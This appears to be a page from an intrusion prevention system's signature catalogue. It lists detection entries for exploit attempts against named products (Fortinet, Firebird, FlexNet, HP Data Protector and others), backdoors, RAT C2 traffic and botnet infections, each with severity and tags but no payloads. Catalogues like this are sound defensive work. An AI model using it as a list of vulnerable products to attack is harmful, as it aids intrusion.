Generic_CS-EMC-Replication-Manager-Command-Execution

About this situation: An attempt to exploit an EMC Replication Manager Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Replication Manager, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: EMC-Replication-Manager-Command-Execution
Description:
Back to top

Generic_CS-EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in EMC RepliStor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC RepliStor, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service
Description:
Back to top

Generic_CS-Energizer-Duo-USB-Charger-Backdoor-Access

About this situation: An attempt to connect backdoor in Energizer Duo USB charger was detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Energizer Duo USB Charger, CVE2010, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-293-4219
Vulnerability: Energizer-Duo-USB-Charger-Backdoor-Access
Description:
Back to top

Generic_CS-Famatech-Radmin-Client-Connection-Attempt

About this situation: Famatech Radmin remote control software usage detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Famatech Radmin, Windows not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-275-4219
Vulnerability: Famatech-Radmin-Usage
Description:
Back to top

Generic_CS-File-Replication-Pro-execCommand-Command-Execution

About this situation: An attempt to exploit a vulnerability in File Replication Pro detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, File Replication Pro, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-748-5211
Vulnerability: File-Replication-Pro-execCommand-Command-Execution
Description:
Back to top

Generic_CS-Finfisher-Spyware-Traffic

About this situation: FinFisher Spyware traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Finfisher-Spyware
Description:
Back to top

Generic_CS-Firebird-Database-Server-Username-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Firebird Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Firebird Database Server, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Firebird-Database-Server-Username-Handling-Buffer-Overflow
Description:
Back to top

Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-1

About this situation: An attempt to exploit a bulnerability in Firebird SQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Firebird SQL, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Firebird-SQL-CNCT-Group-Number-BOF
Description:
Back to top

Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-2

About this situation: An attempt to exploit a bulnerability in Firebird SQL detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Firebird SQL, CVE2013, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Firebird-SQL-CNCT-Group-Number-BOF
Description:
Back to top

Generic_CS-Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Firebird database server
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Firebird Database Server, CVE2008, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-436-4219
Vulnerability: Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service
Description:
Back to top

Generic_CS-Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Fishbowl Server detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Mac OS X, Any Hardware, Fishbowl Server, CVE2022, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization
Description:
Back to top

Generic_CS-FlawedAmmyy-RAT-C2-Traffic

About this situation: FlawedAmmyy RAT C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Vulnerability: Generic_CS-FlawedAmmyy-RAT-C2-Traffic
Description:
Back to top

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow

About this situation: A Flexera FlexNet Publisher License Server Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Flexera FlexNet, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Flexera FlexNet Publisher detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Flexera FlexNet, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Flexera FlexNet Publisher detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Flexera FlexNet, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Flexera FlexNet license server managers detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Flexera FlexNet, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF
Description:
Back to top

Generic_CS-Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788

About this situation: An attempt to exploit a vulnerability in Fortinet FortiClientEMS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FortiClientEMS, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788
Description:
Back to top

Generic_CS-Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection

About this situation: An attempt to exploit a vulnerability in Fortinet FortiManager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiManager, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Vulnerability: Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection
Description:
Back to top

Generic_CS-Fortinet-FortiOS-Format-String-CVE-2024-23113

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: FortiOS, Any Hardware, CVE2024, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: Fortinet-FortiOS-Format-String-CVE-2024-23113
Description:
Back to top

Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2023-34992

About this situation: An attempt to exploit a vulnerability in Fortinet FortiSIEM detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiSIEM, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Fortinet-Fortisiem-Command-Injection-CVE-2023-34992
Description:
Back to top

Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2024-23108

About this situation: An attempt to exploit a vulnerability in Fortinet FortiSIEM detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiSIEM, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Fortinet-Fortisiem-Command-Injection-CVE-2024-23108
Description:
Back to top

Generic_CS-Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884

About this situation: An attempt to exploit a vulnerability in Fortinet FortiManager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiManager, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884
Description:
Back to top

Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Fortinet Single Sign On detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet Single Sign On, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service
Description:
Back to top

Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Fortinet Single Sign On (FSSO) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet Single Sign On, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1761-5242
Vulnerability: Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633

About this situation: An attempt to use Fortra FileCatalyst Workflow HSQLDB default credentials detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Fortra FileCatalyst Workflow, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633
Description:
Back to top

Generic_CS-FreeBSD-Delegate-Proxy-BOF-1

About this situation: FreeBSD Delegate Proxy Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 10
Tags: FreeBSD, Any Hardware, Delegate Proxy, CVE2000, FreeBSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1225-5242
Vulnerability: Delegate-Proxy-Buffer-Overflow
Description:
Back to top

Generic_CS-FreeBSD-Delegate-Proxy-BOF-2

About this situation: FreeBSD Delegate Proxy Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, Delegate Proxy, CVE2000, FreeBSD not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1225-5242
Vulnerability: Delegate-Proxy-Buffer-Overflow
Description:
Back to top

Generic_CS-FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in FreeBSD Project FreeBSD detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2018, FreeBSD not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1148-5242
Vulnerability: FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service
Description:
Back to top

Generic_CS-FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in FreeBSD Project FreeBSD detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2018, FreeBSD not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Vulnerability: FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service
Description:
Back to top

Generic_CS-FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in FreeBSD NFS Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, FreeBSD NFS Server, CVE2018, FreeBSD not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Vulnerability: FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in FreeBSD Nfs server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2013, FreeBSD not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-596-5211
Vulnerability: FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
Description:
Back to top

Generic_CS-FreeSWITCH-Event-Socket-Command-Execution

About this situation: An attempt to exploit a vulnerability in FreeSWITCH detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FreeSWITCH, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: FreeSWITCH-Event-Socket-Command-Execution
Description:
Back to top

Generic_CS-FTP-Traffic-Over-Non-Standard-Port

About this situation: FTP traffic over non-standard port detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Generic FTP client, Any Operating System not specific, Generic FTP client not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-527-5211
Description:
Back to top

Generic_CS-Gafgyt-Linux-Infection-Traffic

About this situation: Gafgyt Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: Gafgyt-Linux-Infection-Traffic
Description:
Back to top

Generic_CS-Galaxy-Store-Improper-Access-Control-CVE-2023-21433

About this situation: An attempt to exploit a vulnerability in Galaxy Store detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Galaxy Store, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Galaxy-Store-Improper-Access-Control-CVE-2023-21433
Description:
Back to top

Generic_CS-Galil-RIO-DoS-CVE-2013-0699

About this situation: A vulnerability in Galil RIO
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Galil RIO, CVE2013, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Galil-RIO-DoS-CVE-2013-0699
Description:
Back to top

Generic_CS-Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow

About this situation: Detected an attempt to exploit a buffer overflow vulnerability in Ganglia
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ganglia, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-720-5211
Vulnerability: Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in General Electric MDS PulseNET detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, General Electric MDS PulseNET, CVE2018, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization
Description:
Back to top

Generic_CS-GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GE Proficy detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, GE Proficy, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow
Description:
Back to top

Generic_CS-GE-Proficy-Real-Time-Information-Portal-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in General Electric Proficy Real-Time Information Portal detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, GE Proficy, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: GE-Proficy-Real-Time-Information-Portal-Directory-Traversal
Description:
Back to top

Generic_CS-Genbroker-Service-Denial-Of-Service

About this situation: GENESIS32, GENESIS64 integer overflow DOS
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, ICONICS Genesis, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Genbroker-Service-Denial-Of-Service
Description:
Back to top

Generic_CS-Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow

About this situation: A Geutebrueck GCore GCoreServer.exe Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Geutebrueck GCore, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow
Description:
Back to top

Generic_CS-Ghost-Activity

About this situation: Ghost activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1550-5242
Vulnerability: Botnet-Ghost
Description:
Back to top

Generic_CS-GIMP-script-fu-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the readstr_upto function in GIMP script-fu detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, GIMP, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-999-5242
Vulnerability: GIMP-script-fu-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Git Source Code Management detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2022, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
Description:
Back to top

Generic_CS-Glutton-Backdoor-C2-Traffic

About this situation: Glutton backdoor activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Glutton malware, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Glutton-Backdoor-Activity
Description:
Back to top

Generic_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GnuTLS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-451-4333
Vulnerability: GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Description:
Back to top

Generic_CS-Goofygobot-Linux-Infection-Traffic

About this situation: Goofygobot Linux infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Goofygobot-Botnet
Description:
Back to top

Generic_CS-Hamweq-Bot-Traffic

About this situation: Hamweq Bot traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Hamweq-Bot
Description:
Back to top

Generic_CS-Hiddentear-Worm-Infection-Traffic

About this situation: Hiddentear worm infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Hiddentear-Worm-Infection-Traffic
Description:
Back to top

Generic_CS-Hikvision-DVR-Buffer-Overflow

About this situation: An attempt to exploit a Hikvision DVR Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Hikvision DVR, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-698-5211
Vulnerability: Hikvision-DVR-Buffer-Overflow
Description:
Back to top

Generic_CS-Honeywell-UniSim-ShadowPlant-Bridge-DoS

About this situation: A vulnerability in Honeywell UniSim ShadowPlant Bridge
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Honeywell UniSim, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Honeywell-UniSim-ShadowPlant-Bridge-DoS
Description:
Back to top

Generic_CS-Host-Header-Localhost

About this situation: Detected localhost as host header
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Description:
Back to top

Generic_CS-HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Application Information Optimizer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Application Information Optimizer, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Data Protector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in HP Data Protector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Data Protector
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1503-5242
Vulnerability: HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal
Description:
Back to top

Generic_CS-HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP Data Protector, CVE2011, Windows not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1059-5242
Vulnerability: HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution
Description:
Back to top

